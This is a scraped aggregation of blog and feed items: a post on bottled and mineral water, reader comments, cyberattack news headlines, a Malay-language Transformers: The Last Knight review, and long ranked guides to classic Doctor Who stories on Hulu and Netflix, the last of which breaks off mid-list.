There is also a lot of controversy about whether alkaline water (pH > 7.0) is generally better for you because it helps your body be less acidic (which is the source of most disease according to alkaline-diet proponents). I hope to research this more and post later about it. But one point worth noting is that supposedly distilled waters are actually slightly acidic because they readily absorb CO2 from the air (carbonic acid).

As I find out more about various bottled water, I'll post them here. For starters, you might consider:

If you have a brand of water that you swear by, please comment on this post.

Further reading: - a great report by the World Health Organization citing a lot of research on why water-without-minerals is unhealthy - a page with lots of information on both sides of the issue - a research paper showing that "hard water" was correlated with lower rates of cardiovascular death

          Comment on Climate Change’s Place in Literature by Beth Carruthers   
Thanks, Chris. This got me thinking of novels such as Bruce Sterling's Heavy Weather (1995). Although he is tagged as one of the key "cyberpunk" group, he was also the founder of the Viridian Design movement (deep, or bright green, as it was alternatively tagged), which I began tracking in 2002. The Viridian movement was the inspiration for "Worldchanging". Then there is Barbara Kingsolver's more recent novel Flight Behaviour. A good one.
          Comment on Senate Bill: Travelers Must Register Cash and Digital Amounts Over $10K or Face 10 Years in Prison and Full Asset Seizure by Doctor Goldstein   
The USA is getting more medieval by the minute. I know how they do things. Even a Canadian visitor like me could be locked up for 10 years. My bitcoins live in cyberspace, and cyberspace includes the USA. I can see an American prosecutor telling the jury some crazy shit like that.
          Qatar denies being hacked by Russia, accuses Gulf countries of cyberattack   

          Review Movie Transformers: The Last Knight (2017)   
Sebenarnya first time saya tengok Transformers ni haha. Tak pernah follow pun series Transformers yang famous gilos sebelum ni. Entah la, tak ada keinginan nak tengok. Eventhough selalu tayang kat TV, tak pernah nak tonton haha. Tengok Transformers: The Last Knight semalam pun sebab tak ada movie lain yang macam best. Yeahh memang ada The Mummy dan Despicable Me 3 tapi masa tayangan tu tak kena dengan masa saya pergi. Disebabkan Transformers: The Last Knight ni masa tayangan di panggung wayang is every 30 minutes ada, thats why I choose to watch the latest Transformers 5. Lagipun, tengok trailers transformers 5 ni macam cool gak.

Transformers: The Last Knight Synopsis

Review Movie Transformers: The Last Knight (2017)
sinopsis Transformers: The Last Knight (2017)
The Last Knight shatters the core myths of the Transformers franchise, and redefines what it means to be a hero. Humans and Transformers are at war, Optimus Prime is gone. The key to saving our future lies buried in the secrets of the past, in the hidden history of Transformers on Earth. Saving our world falls upon the shoulders of an unlikely alliance: Cade Yeager (Mark Wahlberg); Bumblebee; an English Lord (Sir Anthony Hopkins); and an Oxford Professor (Laura Haddock).

There comes a moment in everyone’s life when we are called upon to make a difference. In Transformers: The Last Knight, the hunted will become heroes. Heroes will become villains. Only one world will survive: theirs, or ours.

Director: Michael Bay
Story By: Akiva Goldsman
Screenplay: Ken Nolan, Art Marcum, Matthew Hollaway

Transformers: The Last Knight (2017) Trailer

It has been said.. Through the ages.. without sacrifice, there can be no victory. Two species at war. One flesh. One metal. Optimus Prime has left us. One hundred billion trillion planets in the cosmos.

"You want to know don't you? Why they keep coming here?"
"I wanna stay. And I wanna fight them!"
And now.. two worlds colliding.

"The operation is over!"
"We're not giving up, okay?"

Only one survives.

Review Movie Transformers: The Last Knight

tiket wayang transformers weekdays
bayaran tiket wayang pada hari Selasa di GSC Cinemas, Palm Mall Seremban = RM16
Disebabkan first time saya tengok Transformers, so saya agak fascinated dengan transformers such as Megatron, Optimus Prime, Bumblebee (bee). Lagi-lagi Bee tu perghhh power seh. Cool gilos. Walau kena tembak dan seluruh badan pecah, tetap steady cantum balik semua. I'm like "woahhhhhhh" haha. jakunn.

Dan disebabkan first time saya tengok Transformers, so ada some part tu quite confusing dan tak faham. Tak faham unicron tu apabenda. Or story di sebalik sesuatu peristiwa. Tak tahu nama some robots sebab nampak robot ada yang sama je rupanya haha. Tak tahu mana satu yang baik or pernah jadi baik dulu. 

Movie transformers 5 ni ada unsur komedi juga. Saya paling galak ketawa bila part yang Sir Anthony ceritakan sejarah 12 kesatria (knights) pada zaman dulu kepada hero (Mark) dan heroin (Laura). Sebab time Sir Anthony syok bercerita tu, ada satu 'robot' ni namanya mende ntah. Sibuk laaa main piano lah, buat muzik saspens guna guna suara saprano lah. Serius kelakar part ni haha.

Tapi saya tahu la yang Optimus Prime ni baik dan telah di-mindset-kan oleh 'maker' of Transformers di cybertron, Quintessa yang jahat tu supaya jadi jahat. Suruh bunuh human di Bumi, Bee dan lain-lain.

Bagi saya, cerita ni memang menarik. Rancak. Penuh dengan aksi dan lawan-lawan. Tapi maybe sebab cerita ni 2 jam setengah, so scene last-last tu saya menguap juga la haha. Lagipun scene last tu macam boring sikit. Part di mana mereka nak stop kan cybertron tu daripada musnahkan bumi dan part heroin nak ambil pedang tu. Adoii rasa macam boring dan tak mencabar haha. Rasa macam "cepat la habis, cepat la habis". Mungkin juga sebab jam saya dah menghampiri 11.30 malam. Tu rasa ngantuk di hujung-hujung cerita hehe.

But, overall saya bagi rating movie ni 8.5/10. Mungkin kalau saya follow series transformers dari awal, transformers 1 until transformers 4, saya akan lebih faham & menghayati perjalanan dan details perubahan transformers dalam cerita ni.

Ending movie last knight ni bukanlah ending pun. Ending dia adalah teaser untuk beritahu lepas ni akan ada transformers 6. Tapi saya tak sure nak pergi tengok ke tak Transformers 6 yang akan datang nanti. Tengok lah. Kalau banyak feedback positif dan ramai kata best, boleh la g nonton hehe.

Tapii, untuk sesiapa yang peminat Transformers atau tak pernah tengok sekali pun, saya syorkan pergi la tengok Transformers the last knight ni. Recommended!

Okay daaa~ wassalam! :)

          Why the latest ransomware attack may be harder to stop   
No one has claimed responsibility for a global cyberattack that disabled thousands of computers around the world

          Senior Cyber Security Analyst   

          Don't Want Your Cyber Attacked? Move to the Cloud   
It’s worth noting that cloud computing services like Google and Amazon, which control vast amounts of data around the world, have yet to be crippled by a ransomware attack or even suffer a known data breach.

read more

          Cyberattack Continues to Clog Port Systems, Major Networks    
A cyberattack similar to WannaCry entered its second day, hitting businesses, port operators and government systems around the world, with companies struggling to retake control of their networks.

read more

          Bits of the Bard   


This month, Mike and Roger look at story games, campaign design, and Shakespeare in gaming -- but not Cyberpunk (at least not this time). The first three and a half minutes have some untoward hum, for which we apologise.

          University of New Haven Launches Artifact Genome Project for Digital Forensics Worldwide   
The University of New Haven has set up what it envisions to be the major hub to connect cyber forensics teams the world over: the Artifact Genome Project. Artifacts are traces of digital history that could tell investigators a story of crime.
Staff Author: 

          FBI: Clinton Emails Not Prosecutable, but ‘Extremely Careless’   
As Republicans and Democrats eagerly watched and waited, the Federal Bureau of Investigation combed through tens of thousands of emails sent and received by a U.S. presidential candidate. Investigators scoured servers and individual devices for actions that negligently or purposefully put the nation’s top-secret information at risk.
Staff Author: 



          RANKED: Doctor Who on Hulu   
Shortly after my previous blog post, in which I ranked the eighteen Doctor Who stories available on Netflix streaming, I was alerted to the presence of a larger collection of stories available on Hulu Plus. If you don't mind three commercial breaks per episode (and having to pay for the privilege), you can watch all 18 stories also available on Netflix, plus 74 more.

I'm going to lump these into groups. Ones that I think will go over best with New Series fans, ones that I think are good stories but you might find a bit rough, ones that are mediocre/average (or may be rather tough to get through if you're used to contemporary storytelling and special effects), and ones that are best left untouched (or only for the really brave).

Note: These are listed in BROADCAST ORDER.

Start With These...
54. Inferno (1970, Pertwee, 7 episodes)
This is a rare treat - the Doctor witnesses the destruction of a parallel Earth, can't do a thing to stop it, and as all hell breaks loose around him, he's in the unenviable position to rally a handful of survivors - even though he can't save their lives - to help him get back to 'our' Earth to prevent the same fate here. Fascinating to watch England re-imagined as an Orwellian fascist police state, with deliciously evil versions of the Brigadier, Liz and others. Not so fascinating are the green gorilla monsters, but still, worth the longer running time.

57. The Claws of Axos (1971, Pertwee, 4 episodes)
I love this - golden aliens come to Earth, offering wondrous technology in exchange for nuclear energy for their spaceship. The Doctor isn't fooled, not for a minute. Boundary-pushing special effects (especially episode 4's psychedelic freakout) for 1971. And the Master and Doctor's relationship is fascinating. The Doctor's potential for amorality is never more on display; when he announces he's abandoning Earth to its fate, and is prepared to betray the Time Lords to the Axons, it's plausible that he's serious.

65. The Three Doctors (1972-73, Pertwee, 4 episodes)
66. The Carnival of Monsters  (1973, Pertwee, 4 episodes)
69. The Green Death (1973, Pertwee, 6 episodes)
76. The Ark In Space (1975, Tom Baker, 4 episodes)

88. The Deadly Assassin (1976, Tom Baker, 4 episodes)
The Doctor returns to Gallifrey, is framed for the murder of the Time Lord President, and has to survive a nightmarish trip through the surreal terrain of the Matrix to unmask the real culprit. Very evocative of The Manchurian Candidate with all its political machinations, and the Matrix sequence is stunningly imaginative. Very controversial at the time, partly for the image of Tom Baker being drowned, and partly for knocking down our perceptions of the Time Lords from godlike superbeings to corrupt and/or clueless bumblers.

91. The Talons of Weng-Chiang (1977, Tom Baker, 6 episodes)
A major character is an Asian man played by a caucasian in yellowface (and prosthetic eyebrows), but if you can handle that, this is a great story. And since the BBC's bread and butter was Victorian-era drama, the Sherlock Holmes atmosphere is superbly rendered. The duo of Jago and Lightfoot would go on to star in their own audio adventures.

105. City of Death (1979, Tom Baker, 4 episodes)

114. Warriors' Gate (1981, Tom Baker, 4 episodes)
The cinematic direction and avant-garde flourishes distinguish this convoluted and fascinating story. The third part of a trilogy set in E-Space, it involves a super-heavy spaceship stuck near the gateway to our dimension, who carry a slave race of telepathic lion-like men who navigate the time winds.

136. The Caves of Androzani (1984, Davison, 4 episodes)

If You Survived Those, Try These...
1. An Unearthly Child (1963, Hartnell, 4 ep)
It's a great first episode, with three decent bonus episodes tacked on at the end. It's amazing how much of the show's mythology dates back to these first 25 minutes, and how ruthless and machiavellian the Doctor is initially.

2. The Daleks (1963-64, Hartnell, 7 ep)
Despite show creator Sydney Newman's stern "No Bug-Eyed Monsters" directive, he had to admit his modest aim for an educational adventure program over teatime turned into a cultural institution because of this story. The Daleks are icons. As slow-moving as this show is, it's pretty compelling. The ethics of persuading a pacifist society to take up arms, partly for their own best interest but mostly because four strangers in a blue box need them to, is pretty sticky. And some awesome special effects shots that have aged quite well a half century later.

6. The Aztecs (1964, Hartnell, 4 ep)

9. Planet of Giants (1964, Hartnell, 3 ep)
The "Honey, I Shrank the TARDIS"plot dates to the early brainstorming sessions in the show's development, and they pull it off pretty darn brilliantly. Post production, they edited the third and fourth episodes into a single episode - even then, they acknowledged that the emphasis on dialogue over action could make for tedious TV. Smart choice.

45. The Mind Robber (1968, Troughton, 5 ep)
51. Spearhead From Space (1970, Pertwee, 4 ep)

52. Doctor Who and the Silurians (1970, Pertwee, 7 ep)
Script editor Robert Holmes and producer Barry Letts quickly realized that once they confined the Doctor to Earth, they were limited to two plots: Mad Scientists and Alien Invasion. Here they cleverly sidestep that plot - they've been here already - and throw in a not too subtle parallel to Middle East politics. What do you do when you oversleep, wake up millions of years later, and those pesky apes have evolved into the dominant species on the planet? The Doctor is in the unenviable position of trying to negotiate a peace between two mutually xenophobic species... and he fails spectacularly.

55. Terror of the Autons (1971, Pertwee, 4 ep)
A soft re-boot of the series, with shorter stories, a new companion (Jo Grant), and Barry Letts' master-stroke: an arch-enemy Time Lord, the Master. And in addition to the Autons, we have everyday household items turning into fatal traps: inflatable chairs, troll dolls, and plastic daffodils.

56. The Mind of Evil (1971, Pertwee, 6 ep)
A mess of a plot, but a lot to recommend. An homage (read: ripoff) of A Clockwork Orange that can't decide if criminal behavior is actually due to 'evil impulses' that can be siphoned out of a person's mind, or if that's the bridge being sold to the gullible politicians who buy into it. And Britain has an illegal nerve gas missile that it's trying to dump; shame on them.

59. The Daemons (1971, Pertwee, 5 ep)
The Master appears in his fifth straight story, and after sub-contracting an alien entity that yet again grows too powerful for him to control, and once more has to rely on the Doctor to save his sorry butt, you'd think he'd've learned. This time around he poses as a rural vicar (quite a treat to see him wearing a collar), while summoning a cloven-hoofed demon in the church basement. The Doctor is rather a jerk to Jo in this one, at least in the first scene.

61. The Curse of Peladon (1972, Pertwee, 4 ep)
By this season, the production team was stretching the "exiled to Earth, with certain exceptions" beyond credibility. But this is still a treat, an alien whodunnit that's all about joining the EU, with a bevvy of alien creatures - including the much loved hermaphrodite hexapod Alpha Centauri.

67. Frontier In Space (1973, Pertwee, 6 ep)
Doctor Who rarely attempted grand space opera - mostly because it didn't have the resources - but here they go all out. The Master, with the Ogrons, is secretly manipulating Earth and Draconia into war... and he's a subcontractor working for another menace who are waiting to pounce...  Most of this is capture/escape/re-capture writ large, but it's a grand adventure, and the Draconians are awesome. Pity, though, that it all falls apart at the end, and Roger Delgado never got the sendoff he deserved.

78. Genesis of the Daleks (1975, Tom Baker, 6 ep)
The Time Lords draft the Doctor into trying to prevent the creation of the Daleks. The debut of Davros, their creator, superbly performed by Michael Wisher. Terry Nation modeled the Daleks after Nazi Germany, and no story he wrote made that clearer than this. Lots of corridor acting, and a major cliffhanger copout, but some supremely iconic moments balance it out.

82. Pyramids of Mars (1975, Tom Baker, 4 ep)
92. The Horror of Fang Rock (1977, Tom Baker, 4 ep)
98. The Ribos Operation (1978, Tom Baker, 4 ep)

100. The Stones of Blood (1978, Tom Baker, 4 ep)
Part 3 of the Key To Time season. Blood-sucking rocks, a great villain in Vivian Fay, and a superb sidekick in Professor Rumford (who might be Vivian's lesbian partner...).  Great line: "Doctor, are you from outer space?" "No, I'm from inner time."

110. The Leisure Hive (1980, Tom Baker, 4 ep)

112. Full Circle (Tom Baker, 1980, 4 ep)
Underrated and overlooked.

115. The Keeper of Traken (1981, Tom Baker, 4 ep)
A civilization so placid that evil shrivels up and dies. Yeah, that won't last long...

116. Logopolis (1981, Tom Baker, 4 ep)
Tom Baker's last. Bonkers evil scheme by the Master.

117. Castrovalva (1982, Davison, 4 ep)
Peter Davison's first. Bonkers evil scheme by the Master.

125. Snakedance (1983, Davison, 4 ep)
The Mara (from Kinda) is back.

127. Terminus (1983, Davison, 4 ep)
Grim story, but look for the moment at the end of Ep 3. The Doctor is standing next to the corpse of the space pilot who inadvertently caused the Big Bang... consider the theological implications here.

128. Enlightenment (1983, Davison, 4 ep)
Yacht race in space. Devious girl pirate.

132. The Awakening (1984, Davison, 2 ep)
English Civil War re-enactments are inadvertently summoning a malevolent alien entity. And Tegan visits her grandfather or uncle or something.

133. Frontios (1984, Davison, 4 ep)
Giant alien woodlice destroy the TARDIS, temporarily. Another grim story; one of the last human space colonies are under siege from meteors from above, and said bugs from below.

152. Remembrance of the Daleks (1988, McCoy, 4 ep)
The first story to feature script editor Andrew Cartmel's 'masterplan' to re-envision the Doctor as having a deeper, darker backstory than just being a 'madman with a box.' Two warring factions of Daleks bust up stuff in the Doctor's old stomping grounds.

155. The Greatest Show in the Galaxy (1988-89, McCoy, 4 ep)
An extended metaphor for the state of the program; the Doctor and Ace are trapped in the Psychic Circus, which fanboy WhizzKid acknowledges as "not as great as it used to be, but still..."

158. The Curse of Fenric (1989, McCoy, 4 ep)

159. Survival (1989, McCoy 4 ep)
An ironic title for the final story of the Classic Series... but the Master hasn't been this awesome in over a decade, the cat people look pretty cool, and stuff blows up real good.

If You're Still Hungry For More...
The Chase (1965, Hartnell, 6 ep) - A bumbling troop of Daleks build their own time machine to pursue the TARDIS through eternity. Incompetently executed on every conceivable level (particularly the robot duplicate of the Doctor), this one is classified as "So Bad, It's Actually Awesome." Though the montage of Ian and Barbara safe at home is legitimately wonderful. (The Hulu version contains a clip of the Beatles performing "Ticket to Ride," which is edited out of the DVD release)

The Time Meddler (1965, Hartnell, 4 ep) - We meet another Time Lord for the first time, a comically mischievous meddler in a monk's cassock, trying to change the outcome of the Battle of Hastings, just for the hell of it apparently.

The Ark (1966, Hartnell, 4 ep) - The TARDIS lands on a giant spaceship in the distant future containing the last surviving humans escaping the doomed planet Earth, and new companion Dodo's head cold causes an epidemic.

The War Machines (1966, Hartnell, 4 ep) - the first story since the debut episode set on contemporary Earth, and the first story to feature a supercomputer primed to take over the world.

The Tomb of the Cybermen (1967, Troughton, 4 ep) - not quite as good as its legacy, but still worthy of viewing, though the character of Toberman is troubling

The Enemy of the World (1968, Troughton, 6 ep) - Dr Who does James Bond, and Troughton pulls double-duty as the villain as well. Be glad this was re-discovered.

The Web of Fear (1968, Troughton, 6 ep) - Fondly remembered for its atmosphere - Yeti in the subway! plus the debut of Brigadier Lethbridge-Stewart and a memorable climax. Though to me, it drag

Colony in Space (1971, Pertwee, 6 ep) - Impoverished space farmers versus an all-powerful intergalactic mega-conglomerate. And a doomsday weapon. Guess who wins.

The Sea Devils (Pertwee, 1972, 6 ep) - A virtual re-write of "Silurians," with less subtlety and more stuff blowing up.

The Mutants (Pertwee, 1972, 6 ep) - Better than its reputation, though rather patronizing in that we need the white fathers to sort out the lives of the indigenous people.

The Time Warrior (Pertwee, 1973-4, 4 ep) - Hello Sarah Jane Smith!

Planet of the Spiders (Pertwee, 1974, 6 ep) - Goodbye, Jon Pertwee.

Robot (Tom Baker, 1974-5, 4 ep) - Hello Tom Baker!

Planet of Evil (Tom Baker, 1975, 4 ep) - generic, homage to Forbidden Planet

The Masque of Mandragora (Tom Baker, 1976, 4 ep) - generic, nice medieval setting.

The Sunmakers (Tom Baker, 1977, 4 ep) - extended metaphor for state taxation.

The Invasion of Time (Tom Baker, 1977, 6 ep) - Such a mess, but fun to watch Tom Baker chew scenery

The Pirate Planet
The Androids of Tara
The Power of Kroll

The Creature From The Pit (Tom Baker, 1979, 4ep) - Yeah, the one with the alien that looks like a big green willy. And Tom blows on it. Oh dear.

Nightmare of Eden (Tom Baker, 1979, 4ep) - Drugs are bad, especially when they are the crystalized remains of nasty hairy space beasties. Tom sabotages the ending.

The Horns of Nimon (Tom Baker, 1979, 4ep) - Such a mess, but fun to watch everyone chew scenery.

Meglos (Tom Baker, 1980, 4 ep) - Such a mess, but nice to see Jacqueline Hill (Barbara from season 1-2) again

State of Decay (Tom Baker, 1980, 4 ep) - Decent story, undermined by the hand puppet at the end.

Black Orchid (Davison, 1982, 2 ep) - No alien menace, a murder caper, a cricket match, and it's short.

Resurrection of the Daleks (Davison, 1984, 2 45-min ep) Tedious and grim, but with good moments.

Delta and the Bannermen (McCoy, 1987, 3 ep) Genocide and mass murder at a holiday camp with a hip 50's soundtrack.

Dragonfire (McCoy, 1987, 3 ep) - Alien done as a Christmas pantomime. It almost works.

The Happiness Patrol (McCoy, 1988, 4 ep) - Orwell on acid. Be happy or else.

Battlefield (McCoy, 1989, 4 ep) - Doctor Who does King Arthur. Of course the Doctor is Merlin, who else could he be?

Only The Brave Dare...
The Edge of Destruction (Hartnell, 1964, 2 ep) - trapped in a malfunctioning TARDIS, strong suggestion that it has telepathic capabilities. Great idea but executed poorly and awkwardly.
The Sensorites (Hartnell, 1964, 6 ep) - slow and tedious slog about xenophobia
The Rescue (Hartnell, 1965, 2 ep) - spoiler: Bennett is Koquillion. Now you can skip it.
The Web Planet (Hartnell, 1965, 6 ep) - revolution on a planet of insect people. epic in conception, tedious in execution.
The Space Museum (Hartnell, 1965, 4 ep) - revolution in a museum.
The Gunfighters (Hartnell, 1966, 4 ep) - aka Dr Who at the OK Corral
The Dominators (Troughton, 1968, 5 ep) - it's fun to imagine the title characters as a bickering gay couple
The Krotons (Troughton, 1968-9, 4 ep) - Robert Holmes' first script. They got better.
Planet of the Daleks (Pertwee, 1973, 6 ep) - Invisible Daleks, boring Thals, long slog.
Death to the Daleks (Pertwee, 1974, 4 ep) - Unarmed Daleks, boring Humans, interesting maze.
The Monster of Peladon (Pertwee, 1974, 6 ep) - Caves and corridors, corridors and caves.
The Sontaran Experiment (Tom Baker, 1975, 2 ep) - Filler.
The Android Invasion (Tom Baker, 1975, 4 ep) - aka, the alien plot falls apart if that dude looks under his eyepatch
The Invisible Enemy (Tom Baker, 1977, 4 ep) - Hello, K9.
Underworld (Tom Baker, 1978, 4 ep) - the one with the infamous CSO caves
Destiny of the Daleks (Tom Baker, 1979, 4 ep) - Terry Nation wrote this in his sleep.
The Visitation
Warriors of the Deep (Davison, 1984, 4 ep) - Sea Devils, Silurians, nuclear brinksmanship, all the elements of a good story, but nothing gels. And then there's the Myrkha.
The Twin Dilemma (Colin Baker, 1984, 4 ep) - Worst Doctor Debut story ever. Start of a long, sad decline.
The Mark of the Rani (Colin Baker, 1985, 2 45-min ep) - She sets a trap that turns people into trees. Trees. As if the acting wasn't wooden enough already.
The Two Doctors (Colin Baker, 1985, 3 45-min ep) - Unrelentingly grim, intentionally and unintentionally.
Timelash (Colin Baker, 1985, 2 45 min ep) - famously spells "Lame Shit." Sums it up nicely.
Time and the Rani (McCoy, 1987, 4 ep) - Worst Doctor Debut story since... the previous one.
Silver Nemesis (McCoy, 1988, 3 ep) - Cybermen vs Neo-Nazis vs oh god make it stop.
          RANKED: Classic Doctor Who on Netflix   
Eighteen classic Doctor Who stories from the 60's, 70's and 80's are available for instant streaming on Netflix. If you only know the 'new' (i.e. 2005 and up) series, want to investigate the old series but feel daunted by its half-century legacy and don't know where to start, here's our completely subjective ranking of the Netflix stories.

Before we begin:
- The stories of the classic series (1963-89) were broadcast in individual episodes (usually four, sometimes six, other times as little as two and as many as twelve ), usually 25 minutes in length, so a typical story runs the length of a feature film.
- In the black and white days (1963-69), the show was recorded virtually live to tape, and re-takes were very rare, so minor line fluffs and technical glitches were common.
- In typical BBC fashion, through the 80's, interior shots were on video and exterior shots were on film, so the transition between the two could be jarring. Complicated FX were also frequently done on film.
- We can't talk about early Doctor Who without talking about special effects. Before Star Wars, audiences were a lot more forgiving about hand-puppet dinosaurs, wobbly sets, latex alien suits, flying saucers on strings, etc. The BBC allotted Doctor Who about the same budget as a regular drama series, and the effects, such as they were, still were the most technically advanced television effects of the time.
- There are no Colin Baker (Doctor #6) stories on Netflix, except for his appearance at the end of "Caves of Androzani." Trust us, that's for the best.
- This list does not necessarily reflect how *I* personally feel about these stories, but more my estimate of how fans of the New Series might embrace these stories. I would, for example, rank the two B/W stories much higher.

OK, now for the list, starting from the top:

1. City of Death (1979, 4 episodes)
Doctor: Tom Baker
Companion: Romana II
Writers: Douglas Adams, David Fisher and Graham Williams under the pen-name David Agnew
This is my go-to story to initiate newbies. The plot? Briefly summarized: the Doctor and Romana are enjoying a holiday in Paris when they become embroiled in a time-traveling plot involving selling multiple copies of the Mona Lisa (all original!) on the black market to finance the scientific research of a debonair art thief who's actually an ancient alien war lord attempting to return to a pivotal moment in history. Baker and Lalla Ward have sparkling chemistry (they would later marry, albeit briefly), Adams' script is just the right balance of scientific gobbledygook, wit, and goofy humor, and the Paris location filming is great.
Watch For: a hysterical cameo appearance in Episode Four (I won't spoil the surprise)
Recycling: Adams re-used plot elements from this story and his unfinished/unbroadcast story "Shada" in his novel Dirk Gently's Holistic Detective Agency.

2. The Caves of Androzani (1984, 4 episodes)
Doctor: Peter Davison
Companion: Peri
Writer: Robert Holmes
Apart from the stupid and pointless Magma Beast, this is near-perfection. The Doctor and Peri wander into a web of political and economic intrigue centered around a precious mineral known as Spectrox. The character of Peri pretty much existed to be drooled over by campy villains, and Sharaz Jek, in his Phantom of the Opera slash BDSM mask, is the absolute pinnacle. Robert Holmes had been writing for the series since the late 60's, and his best tropes and anti-capitalist sentiments are on display. Ratcheting up the tension is the fact that the Doctor and Peri are slowly dying thanks to a casual mishap five minutes in, ultimately resulting in Davison's Doctor regenerating into Colin Baker. Davison calls this his favorite story, so much so that if there were more scripts like this, he'd've stayed in the role.

3. Carnival of Monsters (1973, 4 episodes)
Doctor: Jon Pertwee
Companion: Jo Grant
Writer: Robert Holmes
For the previous three seasons, the Doctor has been exiled to Earth by the Time Lords (though the definition of this exile was a bit malleable), but after the previous story (The Three Doctors, more on that later), he is once again free to roam time and space. And where does he land? In the cargo hold of a ship in the middle of the Indian Ocean. Or so we think. And what does it have to do with the Amazing Vorg and his lovely assistant Shirna as he peddles his Miniscope to the gray, drab, bureaucratic denizens of planet Inter Minor? One of Robert Holmes' best scripts.
Look For: Ian Marter plays a dashing young sailor, and would later return as companion Harry Sullivan when Tom Baker took over as Doctor. Also Michael Wisher and Peter Halliday, two of Doctor Who's most memorable guest actors, under the gray makeup.

4. The Ark In Space (1975, 4 episodes)
Doctor: Tom Baker
Companions: Sarah Jane Smith, Harry Sullivan
Writer: Robert Holmes (sensing a theme here?)
The Doctor, Sarah and Harry land on a space ark, thousands of years in the future, where the last surviving humans sit in suspended animation after the Earth is rendered uninhabitable from solar flares, but as these things usually go, they've overslept, there's been vandalism, and an alien menace lurks in the ventilation shaft. This is Doctor Who's version of Alien, but four years earlier and with no budget (and on television, so everything is brightly lit) but they still manage to make green bubble-wrap look menacing. There are some glaring limitations in the budget, but the concept trumps all.
Iconic Moment: Tom Baker's "homo sapiens" speech
Trivia: to save money, the set was re-used for "Revenge of the Cybermen" a few stories later.
More Trivia: The "In Space" was added to distinguish this story from the Hartnell story "The Ark," another story about the future of humanity facing peril on a space ark.
Unintentional Racism: The Ark's sleepers are genetically selected... and yup, they're all white.

5. The Green Death (1973, 6 episodes)
Doctor: Jon Pertwee
Companion: Jo Grant (and the UNIT team)
Writer: Robert Sloman
In an economically depressed Welsh mining town, a new petroleum refinery claims its process creates no waste, but the hippie scientists living in the nearby commune (led by the dashing Clifford Jones) believe otherwise. The Doctor looks in and discovers that, yup, the refinery is dumping its toxic sludge into the abandoned mines, which among other things, is creating a swarm of giant maggots impervious to UNIT bullets. The refinery's mysterious "BOSS" has a hypnotic hold over its employees, and turns out to be a supercomputer with megalomaniacal designs on world domination to achieve 'maximum efficiency and productivity.' A powerfully leftist political stance for the show, overtly conflating capitalism with inhumanity; definitely not recommended for Ayn Rand fans.
Famous Moment: At the end, when the Doctor sneaks out of Jo and Cliff's engagement/farewell party and drives away, alone and heart(s)broken.
Secretly Best Moment: Stevens' tear, after he regains his humanity and saves the world.
Trivia: Jo and Prof. Jones were a real-life couple at the time.
Continuity: The Metebelis Crystal would become a major plot element in Pertwee's farewell story "Planet of Spiders" the following year.

6. Pyramids of Mars (1975, 4 episodes)
Doctor: Tom Baker
Companion: Sarah Jane Smith
Writer: Steven Harris (pseudonym for Robert Holmes and Louis Greifer)
Doctor Who's version of The Mummy. Sutekh, an ancient God, is trapped in a state of paralysis in an Egyptian pyramid by the Eye of Horus, a ruby sitting at the center of a pyramid on Mars. When his tomb is opened, he awakens and sets the stage for his return... with robot mummies. It takes a little while to get going, but Sutekh is one B.A.M.F. of a villain. The showdown between him and the Doctor is truly chilling, and one of Baker's best moments.

7. The Three Doctors (1973, 4 episodes)
Doctor: William Hartnell, Patrick Troughton, Jon Pertwee
Companion: Jo Grant (plus the UNIT team)
Writers: Bob Baker and Dave Martin
If you want to experience the first three Doctors in one sitting and don't want to sit through a black-and-white story (sigh... really?), this is your best bet. This tenth anniversary story was intended to exhibit all three doctors equally, until it was evident that Hartnell's infirmity would make this impossible (the writers' solution is clever, though). The interplay between Troughton and Pertwee is a treat. Omega, the Time Lord villain at the heart of the story, is played way over-the-top, the gel-guards are very very silly, there's a lot of capture-escape-recapture plot padding, but it's a whole lot of fun.

8. The Curse of Fenric (1989, 4 episodes)
Doctor: Sylvester McCoy
Companion: Ace
Writer: Ian Briggs
The Colin Baker and Sylvester McCoy eras were arguably a nadir for the series: the budget and audience kept shrinking, the BBC execs wanted the show gone, producer John Nathan Turner wanted out, and many stories were (in our opinion at least) awful. But the 26th and final season was a brief renaissance, and this was the highlight, with a lot of concepts that laid the groundwork for the new series. It took 25 years to come up with a companion with a backstory, family, and an emotional catharsis to undergo, and seeing this in the classic series was a bit of a revelation. The plot? WWII codebreakers, Russian navy spies (who switch from sub-titled Russian to heavily accented English for no reason whatsoever), and a dormant Norse God coming back to life. And lots of monsters rising from the sea in latex masks. Or something.

9. The Ribos Operation (1978, 4 episodes)
Doctor: Tom Baker
Companion: Romana I
Writer: Robert Holmes
Season sixteen's stories, for the first time in the show's history, comprised an all-encompassing arc; each story centered around finding a segment of the Key to Time, and this was the first story. Although set on an alien planet, there are far more medieval elements than sci-fi. Two intergalactic con men attempt to scam the disgraced warrior prince Graff Vynda-K (an awesomely whackjob name) into buying a planet, and the Doctor and Romana are stuck in the middle. It's a Robert Holmes script so it's witty, funny, and wise, but its truly iconic moment is the Binro the Heretic scene. BINRO WAS RIGHT!

10. The Horror Of Fang Rock (1977, 4 episodes)
Doctor: Tom Baker
Companion: Leela
Writer: Terrence Dicks
A hastily-written script, but very effective. A shape-shifting alien crash-lands near an isolated lighthouse, and starts picking off the crew. It's a little slow-moving (and the episode one cliffhanger is a dud), but stick with this one. Particularly chilling (spoilers, sorry) is the body count: although the enemy menace is defeated, every character except the Doctor and Leela dies.

11. Spearhead From Space (1970, 4 episodes)
Doctor: Jon Pertwee
Companion: Liz Shaw (plus the UNIT crew)
Writer: Robert Holmes
After an unprecedented six month hiatus (after running virtually every week for six years), Doctor Who did a full re-boot with a new lead actor, a new companion (who was also a scientist), a new Earthbound action-oriented direction, and in COLOR!! This one was shot entirely on film due to a strike at the BBC, so it has a cinematic quality to it. The Nestene Consciousness and their animated plastic soldiers, the Autons, were so iconic and tied to the notion of a Doctor Who re-boot, that they were also the villains of the very first New Series episode, complete with an homage to Spearhead's memorable scene of the shop window dummies.
Trivia: the film clips of doll manufacturing were originally set to Fleetwood Mac's "Oh Well," but the music is removed from all VHS and DVD releases.

12. The Leisure Hive (1980, 4 episodes)
Doctor: Tom Baker
Companion: Romana II
Writer: David Fisher
When John Nathan Turner took over as producer after the troubled Graham Williams era, his impact was swift and dramatic: new credits and theme music, a new pool of writers, phasing out K9, an emphasis on synthesizer music, and experimentation with the latest special effects. Tom Baker is a bit lost this season, his seventh and final in the role, and his performance has an autumnal quality with a very tangible change of focus away from the overtly comic direction he'd taken the Doctor. The grab-bag plot involves cloning, nuclear holocaust, and an alien holiday camp. Director Lovett Bickford opens with a memorable panning shot on the beach, and the makeup work on the Doctor when he is aged several hundred years is outstanding.

13. The Mind Robber (1968, 5 episodes)
Doctor: Patrick Troughton
Companions: Zoe, Jamie, and... Alternate Jamie!
